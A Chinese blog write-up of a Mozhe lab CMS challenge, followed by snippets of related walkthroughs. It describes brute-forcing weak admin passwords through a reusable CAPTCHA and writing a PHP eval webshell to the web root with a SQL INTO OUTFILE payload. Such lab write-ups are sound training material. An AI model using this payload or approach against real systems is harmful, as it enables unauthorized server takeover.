代码编织梦想

CMS系统漏洞分析溯源(第6题)

靶场为mozhe中的靶场

访问靶场地址
博客页面找到2个用户名

mozhe666
mozhe777

在这里插入图片描述
目录扫描工具扫到后台

在这里插入图片描述
后台是个带验证码的页面

在这里插入图片描述
这个靶场忘记密码这个功能是不存在,登陆输入框尝试sql注入失败

多次重发同一个包,发现一直提示密码错误,请重新输入。并没有提示验证码错误,说明存在验证码可以共用的漏洞。尝试弱口令爆破上面2个用户

先爆破出mozhe666,密码admin888

在这里插入图片描述
登录后台,写文章的功能试了试好像写不了马

在这里插入图片描述
爆破mozhe777,同样也是弱口令qwer1234

在这里插入图片描述
登录后台,这个功能是真的多应该是管理员

在这里插入图片描述
首先发现了一个上传功能,想传马尝试下没能绕过

在这里插入图片描述
又发现了一个数据库功能,想利用sql语句into outfile直接传马

在这里插入图片描述
先备份数据库导出sql文件,在最后加入

Drop TABLE IF EXISTS tpashell;
Create Table tpashell(`cmd` longtext NOT NULL);
Insert INTO tpashell VALUES('<?php @eval($_POST[tpa]);?>');
Select cmd from tpashell into outfile '/var/www/html/shell.php';
Drop TABLE IF EXISTS tpashell;

在这里插入图片描述
重新导入本地备份

在这里插入图片描述
更新缓存

在这里插入图片描述
哥斯拉连下,拿下flag

在这里插入图片描述

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18980147/article/details/127662033

墨者学院 - cms系统漏洞分析溯源(第4题)_多崎巡礼的博客-爱代码爱编程

使用火狐插件cookie-editor 新增一个cookie value如下 username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admi

墨者 - cms系统漏洞分析溯源(第4题)_吃肉唐僧的博客-爱代码爱编程

用御剑扫描后台 当访问admin/home.asp时候,提示还没登录 上网搜索aspcms的漏洞 参考;https://www.webshell.cc/2944.html 用 cookie manger  伪造cookie cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEE

墨者 - cms系统漏洞分析溯源(第5题)_吃肉唐僧的博客-爱代码爱编程

御剑一顿乱扫 挖到后台登录地址  卡住了,不知如何入手 后来看到别人的解题思路,别人是直接下载了该网站的源码分析, 参考链接:https://www.yuag.org/2016/08/23/phpecms1-3-cookies%E6%AC%BA%E9%AA%97%E6%BC%8F%E6%B4%9E%E8%BF%9B%E5%90%8E%E5%8F

墨者 - cms系统漏洞分析溯源(第6题)_吃肉唐僧的博客-爱代码爱编程

打开环境,根据题目提示 上网搜索emlog博客的后台地址,一般为/admin 但是访问失败,应该是改过路径了 用御剑扫描后台(坑点),只扫出以下地址 分别访问这些地址都没有后台的,后来看别人的解题思路才发现 别人一扫就出来了(换了很多个版本,珍藏版,目录优化版,加强字典版.....均扫不出,一把泪) 这里参考https://blog.csd

墨者学院-cms系统漏洞分析溯源(第2题)-爱代码爱编程

CMS系统漏洞分析溯源(第2题) 难易程度:★★★ 题目类型:CMS漏洞 使用工具:FireFox浏览器 1.打开靶场,首先看看可不可以访问/robots.txt。 发现了后台登录地址/admin.php。 2.访问

墨者学院-cms系统漏洞分析溯源(第4题)-爱代码爱编程

CMS系统漏洞分析溯源(第4题) 难易程度:★★★ 题目类型:身份认证和会话管理 使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场,用wwwscan扫一下。 发现后台/admin/home.asp 2

墨者学院-cms系统漏洞分析溯源(第7题)-爱代码爱编程

CMS系统漏洞分析溯源(第7题) 难易程度:★★ 题目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场,先在网上查一下dedecms的漏洞。 知道了有能在重置密码页面修改任意用户密

墨者靶场 初级:CMS系统漏洞分析溯源(第7题)-爱代码爱编程

墨者靶场 初级:CMS系统漏洞分析溯源(第7题) 题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师对某即将上线的网站进行授权测试,发现是DEDECMS,请帮助工程师完成测试。 实训目标 1、掌握此版本任意用户密码重置漏洞利用; 2、了解漏洞形成原因使用方法; 解题方向 通过漏洞查看已存在账号的资料,获得管理员后台

墨者学院-CMS系统漏洞分析溯源(第7题)——亲妈级教程-爱代码爱编程

墨者学院-CMS系统漏洞分析溯源(第7题)——亲妈级教程 方法一: 1.通过探测发现该靶场为DEDE-CMS 靶场为20180109http://host:post/data/admin/ver.txt 为DEDE版本号位置 2.构造请求获取重置密码链接 请求1:http://219.153.49.228:47258/member/resetpassw

CMS系统漏洞分析溯源(第2题)-爱代码爱编程

靶场: https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRUVm9MSXA2Zz09bW96aGUmozhe 背景介绍 某单位需新上线了一个系统,安全工程师“墨者”负责对系统的安全检测,确保该系统在上线后不存在安全漏洞。 实训目标 1、了解并熟练使用linux命令; 2、了解PHPCMS的后台地

墨者学院—CMS系统漏洞分析溯源(第2题)—3种解法详细介绍-爱代码爱编程

解法一 解题方法: 使用一句话木马进行连接操作步骤: 1.对网址进行探测 2.发现后台版本文件robots.txt 发现CMS为 PHPCMS v9 后台登录页面为 admin.php 3.浏览 自动填入密码 浏览源码可以发现密码为:I@vH@U$9n8* 也可以将源码中密码的字段名由password改为text 4.查看是否与墨者学院-CMS系

墨者学院-CMS系统漏洞分析溯源(第6题)-爱代码爱编程

CMS系统漏洞分析溯源(第6题) 一.解题思路 得到用户名之后爆破密码登录后台,再写入一句话木马 二.操作步骤 1.御剑扫描 可以看到后台登录界面为http://ip:port/servlets/ 2.后台登录: 已知用户名为mozhe777 登录后台 使用Burpsuite抓包,进行暴力破解 设置类型为sniper 开始攻击 得到密码为qwer

漏洞威胁分析报告(上册)- 不同视角下的漏洞威胁-爱代码爱编程

前言 刚刚过去的2020年以极具戏剧性的开场和魔幻现实主义的中章,给传统行业当头一棒,疫情的延伸早已超出了绝大部分人的预料。传统行业被迫转型;企业被迫选择线上办公;学校被迫开设网课。在经济体系运作如此困难的情况下,互联网行业在整个市场却占据更稳定的位置,互联网行业飞速发展的同时也带来了前所未有的网络安全挑战。   热爱网络安全的年轻人们,经历了停工、

血的教训---入侵redis并远程控制你的机器场景复现_刘帅0952的博客-爱代码爱编程

血的教训—入侵redis并远程控制你的机器场景复现 官方一点的叫redis未授权访问漏洞并写入计划任务反弹shell 唉,不怕服务安装部署,就怕上任运维瞎部署防不胜防,全是泪,全是血,唉,开始吧,就是这样的,有这么

node详解-爱代码爱编程

目录 一、什么是后端开发 1.前端与后端 2.后端开发组成 3.后端开发平台 二、学习路径 1.JS基础语法 2.内置API(fs, path, http等等) 3.第三方模块(express,koa,mysql,mongodb等) 三、安装 1.官网:http://nodejs.cn/   (版本选择可按自己需求) 2.打开终端

分久必合?数据库进入“超”融合时代 | 爱分析调研-爱代码爱编程

回顾历史,数据库的发展经历了从单一到多元的变化。 上世纪60年代,网状和层状数据库揭开了数据库系统发展的帷幕;1970年,来自IBM实验室的Edgar F. Codd发表了《大型共享数据库数据的关系模型》论文,提出基于

springboot+mybatisplus+aop实现多数据源切换_mybatis puls 的dao怎么怎么加aop注解-爱代码爱编程

1、背景 在实际开发过程中,我们可能会出现需要用到多数据源的情况,就是应用中可能需要根据场景的不同,对不同的数据库进行操作,此时需要进行多数据源的配置和开发了,在网上看到了很多案例,实现方式各不一样,我这里给大家梳理出来的